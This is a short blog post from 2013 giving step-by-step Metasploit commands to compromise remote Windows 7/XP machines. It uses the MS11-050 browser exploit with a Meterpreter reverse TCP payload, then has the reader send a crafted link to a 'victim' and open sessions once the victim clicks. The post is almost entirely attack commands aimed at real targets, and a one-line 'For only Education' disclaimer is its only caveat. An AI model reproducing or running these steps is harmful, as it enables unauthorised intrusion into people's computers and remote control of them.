Powered by Blogger.

Friday, May 17, 2013

Hacking A Remote Windows Using Metasploit - MegaPost.


Hello Friends , I am back with a blasting post on hacking windows.So, I will give you a little introduction about this post. 
In this post i am gonna hack or control a remote windows 7,xp using metasploit.
So let we start hacking.
 
Follow all steps according to this post ======>


1. Open metasploit in windows or in backtrack.





2. After opening this just type this code :-


use exploit/windows/browser/ms11_050_mshtml_cobjectelement.





3. Now type set payload windows/meterpreter/reverse_tcp


4. Now type set  lhost  192.168.1.2  in place of 192.168.1.2 type your ip address.


5. Now type set srvhost 192.168.1.2  in place of 192.168.1.2 type your ip address.


6. Now type set uripath hackerszonebywasim


7. Now type exploit.


9. Now a server will be created on ur ip and send the link 

http://uripaddress/hackerszonebywasim 

send this link to your victim.


10. Now when your victim open ur link he will be hacked and then type 

sessions -l to start exploiting the victim.

Note : For only Education

View the original article here

0 comments:

Post a Comment